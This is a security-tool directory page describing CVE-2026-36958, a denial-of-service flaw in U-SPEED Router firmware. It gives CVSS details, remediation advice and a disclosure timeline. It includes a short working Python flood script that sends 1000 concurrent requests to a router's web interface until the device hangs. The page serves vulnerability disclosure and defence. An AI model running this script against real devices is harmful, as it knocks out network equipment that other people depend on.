Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-36958 — Proof-of-concept for CVE-2026-36958, a denial-of-service vulnerability in U-SPEED Router firmware that exhausts resources via concurrent HTTP requests, causing the web interface to become unresponsive. | Kitploit
Tools/GitHubGitHub/kirubel-cve/cve-2026-36958
Vulnerability AnalysisExploitationWeb SecurityNetwork SecurityPenetration Testing
GitHubkirubel-cve/cve-2026-36958

CVE-2026-36958

Proof-of-concept for CVE-2026-36958, a denial-of-service vulnerability in U-SPEED Router firmware that exhausts resources via concurrent HTTP requests, causing the web interface to become unresponsive.

View Repository
3 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-36958: Denial of Service via Concurrent HTTP Requests

CVE ID: CVE-2026-36958 Date: 2026-04-29 Discoverer: Kirubel Solomne Vendor: U-SPEED Product: U-SPEED Router Firmware Version: V1.0.0 CWE: CWE-400 - Uncontrolled Resource Consumption


Description

The U-SPEED Router firmware V1.0.0 is vulnerable to Denial of Service. By sending a large number of concurrent HTTP requests to random or non-existent endpoints on the web management interface, an attacker can exhaust system resources in the embedded Boa HTTP server. This causes the router web interface to become unresponsive and may require a manual reboot to restore normal operation.


CVSS Score

CVSS v3.1 Score: 7.5 (High) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

MetricValue
Attack VectorNetwork
Attack ComplexityLow
Privileges RequiredNone
User InteractionNone
Confidentiality ImpactNone
Integrity ImpactNone
Availability ImpactHigh

Proof of Concept

root@kitploit:~
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router web interface is still responsive.")

Expected Behavior: Server should handle concurrent connections gracefully. Actual Behavior: Web interface becomes unresponsive; manual reboot required.


Impact

  • Web management interface becomes unavailable
  • Potential disruption of routing services
  • Requires manual reboot to restore functionality

Remediation

  • Implement connection rate limiting on the Boa web server
  • Limit maximum concurrent connections per source IP
  • Add automatic recovery/watchdog mechanism

Disclosure Timeline

DateEvent
2026-04-29Vulnerability discovered
2026-04-29Reported to MITRE
2026-04-29CVE-2026-36958 assigned
2026-04-29Public disclosure

References

  • MITRE CVE-2026-36958
  • CWE-400
  • Vendor Website
Download Tool